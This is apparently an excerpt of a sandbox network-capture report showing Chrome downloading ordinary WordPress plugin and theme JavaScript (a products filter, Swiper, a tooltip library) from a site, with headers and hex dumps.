                                                                                                          2024-12-12 11:58:35 UTC16384INData Raw: 44 75 72 61 74 69 6f 6e 5b 31 5d 29 2c 65 2e 5f 24 74 6f 6f 6c 74 69 70 2e 71 75 65 75 65 28 6d 29 29 3a 65 2e 5f 24 74 6f 6f 6c 74 69 70 2e 73 74 6f 70 28 29 2e 66 61 64 65 4f 75 74 28 65 2e 5f 5f 6f 70 74 69 6f 6e 73 2e 61 6e 69 6d 61 74 69 6f 6e 44 75 72 61 74 69 6f 6e 5b 31 5d 2c 6d 29 7d 7d 65 6c 73 65 20 67 28 29 7d 72 65 74 75 72 6e 20 65 7d 2c 5f 6f 66 66 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 5f 24 65 6d 69 74 74 65 72 50 72 69 76 61 74 65 2e 6f 66 66 2e 61 70 70 6c 79 28 74 68 69 73 2e 5f 5f 24 65 6d 69 74 74 65 72 50 72 69 76 61 74 65 2c 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6c 69 63 65 2e 61 70 70 6c 79 28 61 72 67 75 6d 65 6e 74 73 29 29 2c 74 68 69 73 7d 2c 5f 6f 6e 3a 66 75 6e 63 74 69 6f 6e
                                                                                                          Data Ascii: Duration[1]),e._$tooltip.queue(m)):e._$tooltip.stop().fadeOut(e.__options.animationDuration[1],m)}}else g()}return e},_off:function(){return this.__$emitterPrivate.off.apply(this.__$emitterPrivate,Array.prototype.slice.apply(arguments)),this},_on:function
                                                                                                          2024-12-12 11:58:35 UTC7005INData Raw: 76 61 72 20 63 3d 7b 74 6f 70 3a 22 62 6f 74 74 6f 6d 22 2c 72 69 67 68 74 3a 22 6c 65 66 74 22 2c 62 6f 74 74 6f 6d 3a 22 74 6f 70 22 2c 6c 65 66 74 3a 22 72 69 67 68 74 22 7d 3b 62 2e 5f 5f 6f 70 74 69 6f 6e 73 2e 73 69 64 65 3d 5b 62 2e 5f 5f 6f 70 74 69 6f 6e 73 2e 73 69 64 65 2c 63 5b 62 2e 5f 5f 6f 70 74 69 6f 6e 73 2e 73 69 64 65 5d 5d 2c 22 6c 65 66 74 22 3d 3d 62 2e 5f 5f 6f 70 74 69 6f 6e 73 2e 73 69 64 65 5b 30 5d 7c 7c 22 72 69 67 68 74 22 3d 3d 62 2e 5f 5f 6f 70 74 69 6f 6e 73 2e 73 69 64 65 5b 30 5d 3f 62 2e 5f 5f 6f 70 74 69 6f 6e 73 2e 73 69 64 65 2e 70 75 73 68 28 22 74 6f 70 22 2c 22 62 6f 74 74 6f 6d 22 29 3a 62 2e 5f 5f 6f 70 74 69 6f 6e 73 2e 73 69 64 65 2e 70 75 73 68 28 22 72 69 67 68 74 22 2c 22 6c 65 66 74 22 29 7d 36 3d 3d 3d 61
                                                                                                          Data Ascii: var c={top:"bottom",right:"left",bottom:"top",left:"right"};b.__options.side=[b.__options.side,c[b.__options.side]],"left"==b.__options.side[0]||"right"==b.__options.side[0]?b.__options.side.push("top","bottom"):b.__options.side.push("right","left")}6===a


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          116192.168.2.2449910147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:34 UTC729OUTGET /wp-content/plugins/woocommerce-products-filter/js/front.js?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:35 UTC283INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:34 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 60554
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:35 UTC16384INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 76 61 72 20 77 6f 6f 66 5f 72 65 64 69 72 65 63 74 20 3d 20 27 27 3b 2f 2f 69 66 20 77 65 20 75 73 65 20 72 65 64 69 72 65 63 74 20 61 74 74 72 69 62 75 74 65 20 69 6e 20 73 68 6f 72 74 63 6f 64 65 20 5b 77 6f 6f 66 5d 0a 76 61 72 20 77 6f 6f 66 5f 72 65 73 65 74 5f 62 74 6e 5f 61 63 74 69 6f 6e 20 3d 20 66 61 6c 73 65 3b 0a 0a 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 74 72 79 0a 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 77 6f 6f 66 5f 63 75 72 72 65 6e 74 5f 76 61 6c 75 65 73 20 3d 20 4a 53 4f 4e 2e 70 61 72 73 65 28 77 6f 6f 66 5f 63 75 72 72 65 6e 74 5f 76 61 6c 75 65 73 29 3b 0a 20 20 20 20 7d 20 63 61 74 63 68 20 28 65 29 0a 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 77 6f 6f
                                                                                                          Data Ascii: "use strict";var woof_redirect = '';//if we use redirect attribute in shortcode [woof]var woof_reset_btn_action = false;jQuery(function () { try { woof_current_values = JSON.parse(woof_current_values); } catch (e) { woo
                                                                                                          2024-12-12 11:58:35 UTC16384INData Raw: 69 6e 20 61 6a 61 78 20 61 6e 64 20 69 6e 20 73 65 74 74 69 6e 67 73 20 74 72 79 20 61 6a 61 78 69 66 79 20 73 68 6f 70 20 69 73 20 59 65 73 0a 20 20 20 20 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 2e 65 61 63 68 28 6a 51 75 65 72 79 28 27 23 77 6f 6f 66 5f 72 65 73 75 6c 74 73 5f 62 79 5f 61 6a 61 78 27 29 2c 20 66 75 6e 63 74 69 6f 6e 20 28 69 6e 64 65 78 2c 20 69 74 65 6d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 6e 64 65 78 20 3d 3d 20 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 69 74 65 6d 29 2e 72 65 6d 6f 76 65 41 74 74 72 28 27 69 64 27
                                                                                                          Data Ascii: in ajax and in settings try ajaxify shop is Yes jQuery.each(jQuery('#woof_results_by_ajax'), function (index, item) { if (index == 0) { return; } jQuery(item).removeAttr('id'
                                                                                                          2024-12-12 11:58:35 UTC16384INData Raw: 74 68 69 73 29 2e 61 64 64 43 6c 61 73 73 28 27 77 6f 6f 66 5f 68 69 64 65 5f 61 75 74 6f 5f 66 6f 72 6d 27 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 27 77 6f 6f 66 5f 73 68 6f 77 5f 61 75 74 6f 5f 66 6f 72 6d 27 29 3b 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 22 2e 77 6f 6f 66 5f 61 75 74 6f 5f 73 68 6f 77 22 29 2e 73 68 6f 77 28 29 2e 61 6e 69 6d 61 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 28 6a 51 75 65 72 79 28 22 2e 77 6f 6f 66 5f 61 75 74 6f 5f 73 68 6f 77 5f 69 6e 64 65 6e 74 22 29 2e 68 65 69 67 68 74 28 29 20 2b 20 32 30 29 20 2b 20 22 70 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 70 61 63 69 74 79 3a
                                                                                                          Data Ascii: this).addClass('woof_hide_auto_form').removeClass('woof_show_auto_form'); jQuery(".woof_auto_show").show().animate( { height: (jQuery(".woof_auto_show_indent").height() + 20) + "px", opacity:
                                                                                                          2024-12-12 11:58:35 UTC11402INData Raw: 7d 0a 0a 2f 2f 66 6f 72 20 22 53 68 6f 77 20 6d 6f 72 65 22 20 62 6c 6f 63 6b 73 0a 66 75 6e 63 74 69 6f 6e 20 77 6f 6f 66 5f 6f 70 65 6e 5f 68 69 64 64 65 6e 5f 6c 69 28 29 20 7b 0a 20 20 20 20 69 66 20 28 6a 51 75 65 72 79 28 27 2e 77 6f 6f 66 5f 6f 70 65 6e 5f 68 69 64 64 65 6e 5f 6c 69 5f 62 74 6e 27 29 2e 6c 65 6e 67 74 68 20 3e 20 30 29 20 7b 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 2e 65 61 63 68 28 6a 51 75 65 72 79 28 27 2e 77 6f 6f 66 5f 6f 70 65 6e 5f 68 69 64 64 65 6e 5f 6c 69 5f 62 74 6e 27 29 2c 20 66 75 6e 63 74 69 6f 6e 20 28 69 2c 20 62 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 6a 51 75 65 72 79 28 62 29 2e 70 61 72 65 6e 74 73 28 27 75 6c 27 29 2e 66 69 6e 64 28 27 6c 69 2e 77 6f 6f 66 5f 68 69 64 64 65 6e 5f 74 65
                                                                                                          Data Ascii: }//for "Show more" blocksfunction woof_open_hidden_li() { if (jQuery('.woof_open_hidden_li_btn').length > 0) { jQuery.each(jQuery('.woof_open_hidden_li_btn'), function (i, b) { if (jQuery(b).parents('ul').find('li.woof_hidden_te


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          117192.168.2.2449911147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:34 UTC740OUTGET /wp-content/plugins/woocommerce-products-filter/js/html_types/radio.js?ver=3.3.0 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          sec-ch-ua: "Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"
                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                          Sec-Fetch-Dest: script
                                                                                                          Referer: https://annavirgili.com/
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:35 UTC282INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:35 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Wed, 21 Dec 2022 11:20:14 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 3417
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:35 UTC3417INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 0a 66 75 6e 63 74 69 6f 6e 20 77 6f 6f 66 5f 69 6e 69 74 5f 72 61 64 69 6f 73 28 29 20 7b 0a 20 20 20 20 69 66 20 28 69 63 68 65 63 6b 5f 73 6b 69 6e 20 21 3d 20 27 6e 6f 6e 65 27 29 20 7b 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 27 2e 77 6f 6f 66 5f 72 61 64 69 6f 5f 74 65 72 6d 27 29 2e 69 43 68 65 63 6b 28 27 64 65 73 74 72 6f 79 27 29 3b 0a 0a 20 20 20 20 20 20 20 20 6a 51 75 65 72 79 28 27 2e 77 6f 6f 66 5f 72 61 64 69 6f 5f 74 65 72 6d 27 29 2e 69 43 68 65 63 6b 28 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 61 64 69 6f 43 6c 61 73 73 3a 20 27 69 72 61 64 69 6f 5f 27 20 2b 20 69 63 68 65 63 6b 5f 73 6b 69 6e 2e 73 6b 69 6e 20 2b 20 27 2d 27 20 2b 20 69 63 68 65 63 6b 5f 73 6b 69 6e 2e 63 6f 6c 6f 72 2c
                                                                                                          Data Ascii: "use strict";function woof_init_radios() { if (icheck_skin != 'none') { jQuery('.woof_radio_term').iCheck('destroy'); jQuery('.woof_radio_term').iCheck({ radioClass: 'iradio_' + icheck_skin.skin + '-' + icheck_skin.color,


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          118192.168.2.2449913147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:35 UTC554OUTGET /wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
                                                                                                          Sec-Fetch-Dest: empty
                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                          Cookie: cjs_id=6fb43b11-a7c2-4ddc-9b52-231329a2a7bd; _ga=GA1.1.528636429.1734004707; _ga_2LEWGZ9NK3=GS1.1.1734004706.1.1.1734004706.0.0.0
                                                                                                          2024-12-12 11:58:35 UTC284INHTTP/1.1 200 OK
                                                                                                          Date: Thu, 12 Dec 2024 11:58:35 GMT
                                                                                                          Server: Apache/2.4.29 (Ubuntu)
                                                                                                          Last-Modified: Fri, 25 Mar 2022 21:30:22 GMT
                                                                                                          Accept-Ranges: bytes
                                                                                                          Content-Length: 139153
                                                                                                          Vary: Accept-Encoding
                                                                                                          Cache-Control: private
                                                                                                          Connection: close
                                                                                                          Content-Type: application/javascript
                                                                                                          2024-12-12 11:58:35 UTC16384INData Raw: 2f 2a 2a 0a 20 2a 20 53 77 69 70 65 72 20 35 2e 33 2e 36 0a 20 2a 20 4d 6f 73 74 20 6d 6f 64 65 72 6e 20 6d 6f 62 69 6c 65 20 74 6f 75 63 68 20 73 6c 69 64 65 72 20 61 6e 64 20 66 72 61 6d 65 77 6f 72 6b 20 77 69 74 68 20 68 61 72 64 77 61 72 65 20 61 63 63 65 6c 65 72 61 74 65 64 20 74 72 61 6e 73 69 74 69 6f 6e 73 0a 20 2a 20 68 74 74 70 3a 2f 2f 73 77 69 70 65 72 6a 73 2e 63 6f 6d 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 34 2d 32 30 32 30 20 56 6c 61 64 69 6d 69 72 20 4b 68 61 72 6c 61 6d 70 69 64 69 0a 20 2a 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 4c 69 63 65 6e 73 65 0a 20 2a 0a 20 2a 20 52 65 6c 65 61 73 65 64 20 6f 6e 3a 20 46 65 62 72 75 61 72 79 20 32 39 2c 20 32 30 32 30 0a 20 2a 2f 0a
                                                                                                          Data Ascii: /** * Swiper 5.3.6 * Most modern mobile touch slider and framework with hardware accelerated transitions * http://swiperjs.com * * Copyright 2014-2020 Vladimir Kharlampidi * * Released under the MIT License * * Released on: February 29, 2020 */
                                                                                                          2024-12-12 11:58:35 UTC16384INData Raw: 2e 77 69 64 74 68 3a 69 5b 30 5d 2e 63 6c 69 65 6e 74 57 69 64 74 68 2c 74 3d 76 6f 69 64 20 30 21 3d 3d 74 68 69 73 2e 70 61 72 61 6d 73 2e 68 65 69 67 68 74 3f 74 68 69 73 2e 70 61 72 61 6d 73 2e 68 65 69 67 68 74 3a 69 5b 30 5d 2e 63 6c 69 65 6e 74 48 65 69 67 68 74 2c 30 3d 3d 3d 65 26 26 74 68 69 73 2e 69 73 48 6f 72 69 7a 6f 6e 74 61 6c 28 29 7c 7c 30 3d 3d 3d 74 26 26 74 68 69 73 2e 69 73 56 65 72 74 69 63 61 6c 28 29 7c 7c 28 65 3d 65 2d 70 61 72 73 65 49 6e 74 28 69 2e 63 73 73 28 22 70 61 64 64 69 6e 67 2d 6c 65 66 74 22 29 2c 31 30 29 2d 70 61 72 73 65 49 6e 74 28 69 2e 63 73 73 28 22 70 61 64 64 69 6e 67 2d 72 69 67 68 74 22 29 2c 31 30 29 2c 74 3d 74 2d 70 61 72 73 65 49 6e 74 28 69 2e 63 73 73 28 22 70 61 64 64 69 6e 67 2d 74 6f 70 22 29 2c
                                                                                                          Data Ascii: .width:i[0].clientWidth,t=void 0!==this.params.height?this.params.height:i[0].clientHeight,0===e&&this.isHorizontal()||0===t&&this.isVertical()||(e=e-parseInt(i.css("padding-left"),10)-parseInt(i.css("padding-right"),10),t=t-parseInt(i.css("padding-top"),
                                                                                                          2024-12-12 11:58:35 UTC16384INData Raw: 72 2e 6f 6e 53 6c 69 64 65 54 6f 57 72 61 70 70 65 72 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 29 29 29 2c 21 30 7d 2c 73 6c 69 64 65 54 6f 4c 6f 6f 70 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 2c 73 29 7b 76 6f 69 64 20 30 3d 3d 3d 65 26 26 28 65 3d 30 29 2c 76 6f 69 64 20 30 3d 3d 3d 74 26 26 28 74 3d 74 68 69 73 2e 70 61 72 61 6d 73 2e 73 70 65 65 64 29 2c 76 6f 69 64 20 30 3d 3d 3d 69 26 26 28 69 3d 21 30 29 3b 76 61 72 20 61 3d 65 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 61 72 61 6d 73 2e 6c 6f 6f 70 26 26 28 61 2b 3d 74 68 69 73 2e 6c 6f 6f 70 65 64 53 6c 69 64 65 73 29 2c 74 68 69 73 2e 73 6c 69 64 65 54 6f 28 61 2c 74 2c 69 2c 73 29 7d 2c 73 6c 69 64 65 4e 65 78 74 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 69 29 7b 76 6f 69 64 20 30 3d 3d 3d 65
                                                                                                          Data Ascii: r.onSlideToWrapperTransitionEnd))),!0},slideToLoop:function(e,t,i,s){void 0===e&&(e=0),void 0===t&&(t=this.params.speed),void 0===i&&(i=!0);var a=e;return this.params.loop&&(a+=this.loopedSlides),this.slideTo(a,t,i,s)},slideNext:function(e,t,i){void 0===e
                                                                                                          2024-12-12 11:58:35 UTC16384INData Raw: 6d 6f 6d 65 6e 74 75 6d 42 6f 75 6e 63 65 22 29 2c 74 2e 73 65 74 54 72 61 6e 73 69 74 69 6f 6e 28 73 2e 73 70 65 65 64 29 2c 74 2e 73 65 74 54 72 61 6e 73 6c 61 74 65 28 78 29 2c 6f 2e 74 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 26 26 21 74 2e 64 65 73 74 72 6f 79 65 64 26 26 74 2e 74 72 61 6e 73 69 74 69 6f 6e 45 6e 64 28 29 7d 29 29 29 7d 29 29 29 3a 74 2e 76 65 6c 6f 63 69 74 79 3f 28 74 2e 75 70 64 61 74 65 50 72 6f 67 72 65 73 73 28 79 29 2c 74 2e 73 65 74 54 72 61 6e 73 69 74 69 6f 6e 28 62 29 2c 74 2e 73 65 74 54 72 61 6e 73 6c 61 74 65 28 79 29 2c 74 2e 74 72 61 6e 73 69 74 69 6f 6e 53 74 61 72 74 28 21 30 2c 74 2e 73 77 69 70 65 44 69 72 65 63 74 69 6f 6e 29 2c 74 2e 61 6e 69 6d 61 74 69 6e 67 7c 7c 28 74 2e
                                                                                                          Data Ascii: momentumBounce"),t.setTransition(s.speed),t.setTranslate(x),o.transitionEnd((function(){t&&!t.destroyed&&t.transitionEnd()})))}))):t.velocity?(t.updateProgress(y),t.setTransition(b),t.setTranslate(y),t.transitionStart(!0,t.swipeDirection),t.animating||(t.
                                                                                                          2024-12-12 11:58:36 UTC16384INData Raw: 6c 6c 29 2c 6e 2e 64 65 6c 65 74 65 50 72 6f 70 73 28 69 29 29 2c 69 2e 64 65 73 74 72 6f 79 65 64 3d 21 30 2c 6e 75 6c 6c 29 7d 2c 74 2e 65 78 74 65 6e 64 44 65 66 61 75 6c 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 2e 65 78 74 65 6e 64 28 46 2c 65 29 7d 2c 69 2e 65 78 74 65 6e 64 65 64 44 65 66 61 75 6c 74 73 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 46 7d 2c 69 2e 64 65 66 61 75 6c 74 73 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 56 7d 2c 69 2e 43 6c 61 73 73 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 7d 2c 69 2e 24 2e 67 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 73 7d 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 28 74
                                                                                                          Data Ascii: ll),n.deleteProps(i)),i.destroyed=!0,null)},t.extendDefaults=function(e){n.extend(F,e)},i.extendedDefaults.get=function(){return F},i.defaults.get=function(){return V},i.Class.get=function(){return e},i.$.get=function(){return s},Object.defineProperties(t
                                                                                                          2024-12-12 11:58:36 UTC16384INData Raw: 73 28 61 29 2c 6e 3d 72 2e 69 6e 64 65 78 28 29 3b 6e 3d 3d 3d 69 26 26 72 2e 61 64 64 43 6c 61 73 73 28 74 2e 62 75 6c 6c 65 74 41 63 74 69 76 65 43 6c 61 73 73 29 2c 74 2e 64 79 6e 61 6d 69 63 42 75 6c 6c 65 74 73 26 26 28 6e 3e 3d 6f 26 26 6e 3c 3d 6c 26 26 72 2e 61 64 64 43 6c 61 73 73 28 74 2e 62 75 6c 6c 65 74 41 63 74 69 76 65 43 6c 61 73 73 2b 22 2d 6d 61 69 6e 22 29 2c 6e 3d 3d 3d 6f 26 26 72 2e 70 72 65 76 28 29 2e 61 64 64 43 6c 61 73 73 28 74 2e 62 75 6c 6c 65 74 41 63 74 69 76 65 43 6c 61 73 73 2b 22 2d 70 72 65 76 22 29 2e 70 72 65 76 28 29 2e 61 64 64 43 6c 61 73 73 28 74 2e 62 75 6c 6c 65 74 41 63 74 69 76 65 43 6c 61 73 73 2b 22 2d 70 72 65 76 2d 70 72 65 76 22 29 2c 6e 3d 3d 3d 6c 26 26 72 2e 6e 65 78 74 28 29 2e 61 64 64 43 6c 61 73 73
                                                                                                          Data Ascii: s(a),n=r.index();n===i&&r.addClass(t.bulletActiveClass),t.dynamicBullets&&(n>=o&&n<=l&&r.addClass(t.bulletActiveClass+"-main"),n===o&&r.prev().addClass(t.bulletActiveClass+"-prev").prev().addClass(t.bulletActiveClass+"-prev-prev"),n===l&&r.next().addClass
                                                                                                          2024-12-12 11:58:36 UTC16384INData Raw: 2c 20 22 2b 69 2e 63 75 72 72 65 6e 74 59 2b 22 70 78 2c 30 29 22 29 7d 7d 2c 6f 6e 54 72 61 6e 73 69 74 69 6f 6e 45 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 74 68 69 73 2e 7a 6f 6f 6d 2c 74 3d 65 2e 67 65 73 74 75 72 65 3b 74 2e 24 73 6c 69 64 65 45 6c 26 26 74 68 69 73 2e 70 72 65 76 69 6f 75 73 49 6e 64 65 78 21 3d 3d 74 68 69 73 2e 61 63 74 69 76 65 49 6e 64 65 78 26 26 28 74 2e 24 69 6d 61 67 65 45 6c 2e 74 72 61 6e 73 66 6f 72 6d 28 22 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 20 73 63 61 6c 65 28 31 29 22 29 2c 74 2e 24 69 6d 61 67 65 57 72 61 70 45 6c 2e 74 72 61 6e 73 66 6f 72 6d 28 22 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 22 29 2c 65 2e 73 63 61 6c 65 3d 31 2c 65 2e 63 75 72 72 65 6e 74 53 63 61 6c
                                                                                                          Data Ascii: , "+i.currentY+"px,0)")}},onTransitionEnd:function(){var e=this.zoom,t=e.gesture;t.$slideEl&&this.previousIndex!==this.activeIndex&&(t.$imageEl.transform("translate3d(0,0,0) scale(1)"),t.$imageWrapEl.transform("translate3d(0,0,0)"),e.scale=1,e.currentScal
                                                                                                          2024-12-12 11:58:36 UTC16384INData Raw: 69 76 3e 27 29 2c 69 2e 61 70 70 65 6e 64 28 65 29 29 2c 65 2e 63 73 73 28 7b 68 65 69 67 68 74 3a 72 2b 22 70 78 22 7d 29 29 3a 30 3d 3d 3d 28 65 3d 74 2e 66 69 6e 64 28 22 2e 73 77 69 70 65 72 2d 63 75 62 65 2d 73 68 61 64 6f 77 22 29 29 2e 6c 65 6e 67 74 68 26 26 28 65 3d 73 28 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 77 69 70 65 72 2d 63 75 62 65 2d 73 68 61 64 6f 77 22 3e 3c 2f 64 69 76 3e 27 29 2c 74 2e 61 70 70 65 6e 64 28 65 29 29 29 3b 66 6f 72 28 76 61 72 20 75 3d 30 3b 75 3c 61 2e 6c 65 6e 67 74 68 3b 75 2b 3d 31 29 7b 76 61 72 20 76 3d 61 2e 65 71 28 75 29 2c 66 3d 75 3b 70 26 26 28 66 3d 70 61 72 73 65 49 6e 74 28 76 2e 61 74 74 72 28 22 64 61 74 61 2d 73 77 69 70 65 72 2d 73 6c 69 64 65 2d 69 6e 64 65 78 22 29 2c 31 30 29 29 3b 76 61 72 20
                                                                                                          Data Ascii: iv>'),i.append(e)),e.css({height:r+"px"})):0===(e=t.find(".swiper-cube-shadow")).length&&(e=s('<div class="swiper-cube-shadow"></div>'),t.append(e)));for(var u=0;u<a.length;u+=1){var v=a.eq(u),f=u;p&&(f=parseInt(v.attr("data-swiper-slide-index"),10));var
                                                                                                          2024-12-12 11:58:36 UTC8081INData Raw: 63 6f 6e 74 72 6f 6c 26 26 74 68 69 73 2e 63 6f 6e 74 72 6f 6c 6c 65 72 2e 73 70 6c 69 6e 65 26 26 28 74 68 69 73 2e 63 6f 6e 74 72 6f 6c 6c 65 72 2e 73 70 6c 69 6e 65 3d 76 6f 69 64 20 30 2c 64 65 6c 65 74 65 20 74 68 69 73 2e 63 6f 6e 74 72 6f 6c 6c 65 72 2e 73 70 6c 69 6e 65 29 7d 2c 6f 62 73 65 72 76 65 72 55 70 64 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 63 6f 6e 74 72 6f 6c 6c 65 72 2e 63 6f 6e 74 72 6f 6c 26 26 74 68 69 73 2e 63 6f 6e 74 72 6f 6c 6c 65 72 2e 73 70 6c 69 6e 65 26 26 28 74 68 69 73 2e 63 6f 6e 74 72 6f 6c 6c 65 72 2e 73 70 6c 69 6e 65 3d 76 6f 69 64 20 30 2c 64 65 6c 65 74 65 20 74 68 69 73 2e 63 6f 6e 74 72 6f 6c 6c 65 72 2e 73 70 6c 69 6e 65 29 7d 2c 73 65 74 54 72 61 6e 73 6c 61 74 65 3a 66 75 6e 63 74 69 6f 6e
                                                                                                          Data Ascii: control&&this.controller.spline&&(this.controller.spline=void 0,delete this.controller.spline)},observerUpdate:function(){this.controller.control&&this.controller.spline&&(this.controller.spline=void 0,delete this.controller.spline)},setTranslate:function


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          119192.168.2.2449914147.135.166.534437012C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-12 11:58:35 UTC540OUTGET /wp-content/themes/ciena/assets/js/mega-menu.js?ver=1.0.8 HTTP/1.1
                                                                                                          Host: annavirgili.com
                                                                                                          Connection: keep-alive
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
                                                                                                          Accept: */*
                                                                                                          Sec-Fetch-Site: none
                                                                                                          Sec-Fetch-Mode: cors
